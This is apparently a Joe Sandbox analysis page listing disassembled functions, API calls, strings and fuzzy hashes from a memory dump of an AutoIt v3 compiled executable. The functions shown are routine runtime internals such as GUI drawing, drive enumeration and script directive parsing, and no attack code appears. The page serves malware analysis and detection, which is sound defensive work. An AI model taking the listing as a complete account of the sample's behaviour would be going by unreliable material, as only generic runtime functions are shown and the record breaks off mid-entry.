CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003D779B
GetStockObject.GDI32(00000011), ref: 003D77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003D77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003D77BB

Strings

msctls_progress32, xrefs: 003D773C
static, xrefs: 003D767D, 003D7795
AutoIt v3, xrefs: 003D762B
DISPLAY, xrefs: 003D7688

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
Instruction ID: 37aba0aa763873870e99743a2ce73540a4e49df4eb2eccfb27bd1fb44205bbac
Opcode Fuzzy Hash: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
Instruction Fuzzy Hash: 46A18471A00615BFEB25DBA4DC49FAE777DEB09710F108215FA14AB2E0D7B0AD01CB64

Function 003CAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003CAD1E
GetDriveTypeW.KERNEL32(?,003EFAC0,?,\\.\,003EF910), ref: 003CADFB
SetErrorMode.KERNEL32(00000000,003EFAC0,?,\\.\,003EF910), ref: 003CAF59

Strings

Network, xrefs: 003CAE39
USB, xrefs: 003CAEF0
ATAPI, xrefs: 003CAECD
CDROM, xrefs: 003CAE2F
SCSI, xrefs: 003CAEC6
RAMDisk, xrefs: 003CAE25
FileBackedVirtual, xrefs: 003CAF28
iSCSI, xrefs: 003CAEFE
RAID, xrefs: 003CAEF7
SAS, xrefs: 003CAF05
SSA, xrefs: 003CAEE2
Fibre, xrefs: 003CAEE9
SATA, xrefs: 003CAF0C
MMC, xrefs: 003CAF1A
PhysicalDrive, xrefs: 003CADA7
SSD, xrefs: 003CAE86
Removable, xrefs: 003CAE4D
Unknown, xrefs: 003CAE1B, 003CAEBF
ATA, xrefs: 003CAED4
Fixed, xrefs: 003CAE43
\\.\, xrefs: 003CAD70
Virtual, xrefs: 003CAF21
1394, xrefs: 003CAEDB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
Instruction ID: c0f80f204004e6a5069744047aafc9990cdf08c7dcd52c94c954b9fff9d4ff24
Opcode Fuzzy Hash: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
Instruction Fuzzy Hash: 0251B3B0648A0D9B8B02DB20CD82FBD73A4EF48308B30855FF407EB690CA74AD41DB56

Function 003668DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00366931
__wcsnicmp.LIBCMT ref: 00366949
__wcsnicmp.LIBCMT ref: 00366961
__wcsnicmp.LIBCMT ref: 00366979
__wcsnicmp.LIBCMT ref: 00366991
__wcsnicmp.LIBCMT ref: 003669A9
__wcsnicmp.LIBCMT ref: 003669C1
__wcsnicmp.LIBCMT ref: 003669D5
__wcsnicmp.LIBCMT ref: 00366A16
__wcsnicmp.LIBCMT ref: 00366A2A
__wcsnicmp.LIBCMT ref: 00366A3E
__wcsnicmp.LIBCMT ref: 00366A52

Strings

#requireadmin, xrefs: 0036695B
#notrayicon, xrefs: 00366943
#include-once, xrefs: 0036698B
#OnAutoItStartRegister, xrefs: 00366973
#ce, xrefs: 00366A4C
#include, xrefs: 003669A3
#pragma compile, xrefs: 0036692B
#comments-end, xrefs: 00366A38
#cs, xrefs: 003669CF, 00366A24
Cannot parse #include, xrefs: 0039E3F0
Bad directive syntax error, xrefs: 0039E31A
Unterminated group of comments, xrefs: 0039E403
#comments-start, xrefs: 003669BB, 00366A10

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: e353fae4cffc5d296cce980c810e5f9fc09de736b9734240276d10388187b2c4
Instruction ID: eaccd9a74934b103b1d4003874998b834cf8663ee91c132ac638ac538f37f71e
Opcode Fuzzy Hash: e353fae4cffc5d296cce980c810e5f9fc09de736b9734240276d10388187b2c4
Instruction Fuzzy Hash: 8181E5B1640305AADF23BB61DC83FBF37A8AF15740F048025FD05AF19AEB61DA45D6A1

Function 003E9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003E9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003E9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 003E9BA7

Strings

0, xrefs: 003E9BE4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
Instruction ID: f652ae33a2dff04b3136a72607b81b3e7dbc169f982711e044422d8b7586a9e6
Opcode Fuzzy Hash: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
Instruction Fuzzy Hash: 5902D2301042A1AFD726CF16C885BAABBE9FF89300F04872EF595DA2E1C775D945CB51

Function 003EA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 003EA903
SetTextColor.GDI32(?,?), ref: 003EA907
GetSysColorBrush.USER32(0000000F), ref: 003EA91D
GetSysColor.USER32(0000000F), ref: 003EA928
CreateSolidBrush.GDI32(?), ref: 003EA92D
GetSysColor.USER32(00000011), ref: 003EA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
SelectObject.GDI32(?,00000000), ref: 003EA964
SetBkColor.GDI32(?,00000000), ref: 003EA96D
SelectObject.GDI32(?,?), ref: 003EA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003EAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 003EAA32
DrawFocusRect.USER32(?,?), ref: 003EAA3D
GetSysColor.USER32(00000011), ref: 003EAA4B
SetTextColor.GDI32(?,00000000), ref: 003EAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003EAA67
SelectObject.GDI32(?,003EA5FA), ref: 003EAA7E
DeleteObject.GDI32(?), ref: 003EAA89
SelectObject.GDI32(?,?), ref: 003EAA8F
DeleteObject.GDI32(?), ref: 003EAA94
SetTextColor.GDI32(?,?), ref: 003EAA9A
SetBkColor.GDI32(?,?), ref: 003EAAA4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 00cba71d905be99907bb8c101f0db3e0c18a1316f56c7813f0f8e4e61bbd910f
Instruction ID: 50d1458001a82b424cee2a74a2b1d6dea80c7ad36ca65aa070025a3583d1a12d
Opcode Fuzzy Hash: 00cba71d905be99907bb8c101f0db3e0c18a1316f56c7813f0f8e4e61bbd910f
Instruction Fuzzy Hash: 7F514D71900658EFDF229FA5DC88EAE7B79EB48320F114225F911AB2E1D7B1A940DF50

Function 003E89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003E8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8AD2
CharNextW.USER32(0000014E), ref: 003E8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003E8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003E8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003E8B86
SetWindowTextW.USER32(?,0000014E), ref: 003E8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003E8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 003E8C1F
_memset.LIBCMT ref: 003E8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003E8C8D
_memset.LIBCMT ref: 003E8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 003E8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 003E8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 003E8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 003E8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8EB4
DrawMenuBar.USER32(?), ref: 003E8EC3
SetWindowTextW.USER32(?,0000014E), ref: 003E8EEB

Strings

0, xrefs: 003E8E55

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 7e788a712a083e91107fd94933b2143d672250f5aa2a1c585cae182e9409bb87
Instruction ID: 9c01809681362f92dc6fd8ee9f62f50fadf93a971d1c08ae04aa98e3226b9e81
Opcode Fuzzy Hash: 7e788a712a083e91107fd94933b2143d672250f5aa2a1c585cae182e9409bb87
Instruction Fuzzy Hash: ECE183709002A8AFDF22DF51DC84EEE7B79EF05710F118266F919AA1D0DB709A81DF60

Function 003E488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 003E49CA
GetDesktopWindow.USER32 ref: 003E49DF
GetWindowRect.USER32(00000000), ref: 003E49E6
GetWindowLongW.USER32(?,000000F0), ref: 003E4A48
DestroyWindow.USER32(?), ref: 003E4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 003E4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E4B09
IsWindowVisible.USER32(?), ref: 003E4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E4B58
GetWindowRect.USER32(?,?), ref: 003E4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 003E4B96
GetMonitorInfoW.USER32(00000000,?), ref: 003E4BB0
CopyRect.USER32(?,?), ref: 003E4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 003E4C32

Strings

(, xrefs: 003E4BA3
tooltips_class32, xrefs: 003E4A96
0, xrefs: 003E4975

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
Instruction ID: e6f3e9d43c9eb8eb0b8c7b7e2224a475f0739ef4e9b977f5debd5132f856826b
Opcode Fuzzy Hash: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
Instruction Fuzzy Hash: 13B19C70604390AFDB15DF65C884B6ABBE8FF88310F008A2DF5999B2A1D771EC05CB55

Function 003C449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 003C44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003C44D2
_wcscpy.LIBCMT ref: 003C4500
_wcscmp.LIBCMT ref: 003C450B
_wcscat.LIBCMT ref: 003C4521
_wcsstr.LIBCMT ref: 003C452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003C4548
_wcscat.LIBCMT ref: 003C4591
_wcscat.LIBCMT ref: 003C4598
_wcsncpy.LIBCMT ref: 003C45C3

Strings

DefaultLangCodepage, xrefs: 003C45AB
StringFileInfo\, xrefs: 003C451B
04090000, xrefs: 003C457E
%u.%u.%u.%u, xrefs: 003C4626
\VarFileInfo\Translation, xrefs: 003C4540

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 3c5584aace79f084933643bd4cd533918ced6022798e8bc38769a8890cdc652a
Instruction ID: 66dccd518503e8a3bb17d9a3c42b9d48fedf45802a5dbfe21d7177ebccc87acf
Opcode Fuzzy Hash: 3c5584aace79f084933643bd4cd533918ced6022798e8bc38769a8890cdc652a
Instruction Fuzzy Hash: 2941D371A003007BDB17BA748C42FBF776CDF42710F1005AAF905EA1C2EA74AA0197A9

Function 003627D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628BC
GetSystemMetrics.USER32(00000007), ref: 003628C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628EF
GetSystemMetrics.USER32(00000008), ref: 003628F7
GetSystemMetrics.USER32(00000004), ref: 0036291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00362939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00362949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00362990
GetClientRect.USER32(00000000,000000FF), ref: 003629AE
GetStockObject.GDI32(00000011), ref: 003629CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 003629D5

Part of subcall function 00362344: GetCursorPos.USER32(?), ref: 00362357
Part of subcall function 00362344: ScreenToClient.USER32(004257B0,?), ref: 00362374
Part of subcall function 00362344: GetAsyncKeyState.USER32(00000001), ref: 00362399
Part of subcall function 00362344: GetAsyncKeyState.USER32(00000002), ref: 003623A7

SetTimer.USER32(00000000,00000000,00000028,00361256), ref: 003629FC

Strings

AutoIt v3 GUI, xrefs: 00362974
-es, xrefs: 00362912

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: -es$AutoIt v3 GUI
API String ID: 1458621304-1956769002
Opcode ID: 628ded53a0f66efb821de22b6031943e9d17a133d18461951b6e69b873f13de5
Instruction ID: 8945076a3ec82916408305ea3ce2c004ddb4cb636ce93b4c45370a8739cb87f0
Opcode Fuzzy Hash: 628ded53a0f66efb821de22b6031943e9d17a133d18461951b6e69b873f13de5
Instruction Fuzzy Hash: CCB18071600609DFDF26DFA8DC85BAE77B4FB48310F118225FA15AB2D4CBB49851CB54

Function 003BA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003BA47A
__swprintf.LIBCMT ref: 003BA51B
_wcscmp.LIBCMT ref: 003BA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BA583
_wcscmp.LIBCMT ref: 003BA5BF
GetClassNameW.USER32(?,?,00000400), ref: 003BA5F6
GetDlgCtrlID.USER32(?), ref: 003BA648
GetWindowRect.USER32(?,?), ref: 003BA67E
GetParent.USER32(?), ref: 003BA69C
ScreenToClient.USER32(00000000), ref: 003BA6A3
GetClassNameW.USER32(?,?,00000100), ref: 003BA71D
_wcscmp.LIBCMT ref: 003BA731
GetWindowTextW.USER32(?,?,00000400), ref: 003BA757
_wcscmp.LIBCMT ref: 003BA76B

Part of subcall function 0038362C: _iswctype.LIBCMT ref: 00383634

Strings

%s%u, xrefs: 003BA515

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
Instruction ID: 6e2b0b6292385114928e1dfb3262b5382f731e36f3678dafd7203fcfd68fbdbb
Opcode Fuzzy Hash: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
Instruction Fuzzy Hash: 76A1C471204F06AFD716DF64C885BEAB7E8FF44358F004529FA99C6590DB30EA45CB92

Function 003BAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 003BAF18
_wcscmp.LIBCMT ref: 003BAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 003BAF51
CharUpperBuffW.USER32(?,00000000), ref: 003BAF6E
_wcscmp.LIBCMT ref: 003BAF8C
_wcsstr.LIBCMT ref: 003BAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 003BAFD5
_wcscmp.LIBCMT ref: 003BAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 003BB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 003BB055
_wcscmp.LIBCMT ref: 003BB065
GetClassNameW.USER32(00000010,?,00000400), ref: 003BB08D
GetWindowRect.USER32(00000004,?), ref: 003BB0F6

Strings

@, xrefs: 003BAEF9
ThumbnailClass, xrefs: 003BAFE0, 003BB060

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
Instruction ID: b4b482d3f0c820d0921c4ec5cbb9600f50391e2aa72949d9f4bbd9d0bd594607
Opcode Fuzzy Hash: ce68e4e7a3e35dc3971abd49b7b6afd6ac7091c920bc369814553a32d7ce988a
Instruction Fuzzy Hash: 5081CF711083059FDB12DF14C881BFAB7E8EF44718F04856AFE858A095DB74DE45CB61

Function 003EC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

DragQueryPoint.SHELL32(?,?), ref: 003EC627

Part of subcall function 003EAB37: ClientToScreen.USER32(?,?), ref: 003EAB60
Part of subcall function 003EAB37: GetWindowRect.USER32(?,?), ref: 003EABD6
Part of subcall function 003EAB37: PtInRect.USER32(?,?,003EC014), ref: 003EABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 003EC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003EC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003EC6BE
_wcscat.LIBCMT ref: 003EC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 003EC705
SendMessageW.USER32(?,000000B0,?,?), ref: 003EC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 003EC735
SendMessageW.USER32(?,000000B1,?,?), ref: 003EC757
DragFinish.SHELL32(?), ref: 003EC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003EC851

Strings

@GUI_DRAGFILE, xrefs: 003EC800
pbB, xrefs: 003EC79B
@GUI_DROPID, xrefs: 003EC77E
@GUI_DRAGID, xrefs: 003EC7C9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbB
API String ID: 169749273-33125029
Opcode ID: c3328575586857c1007ed862a53f6cd3b17a0fde88e4ddfa8a1bfdbbea8bfdb9
Instruction ID: ea5b79ec9e6f17c6e3483cf75f10191c6b496df521f3720c933e7497498c47fa
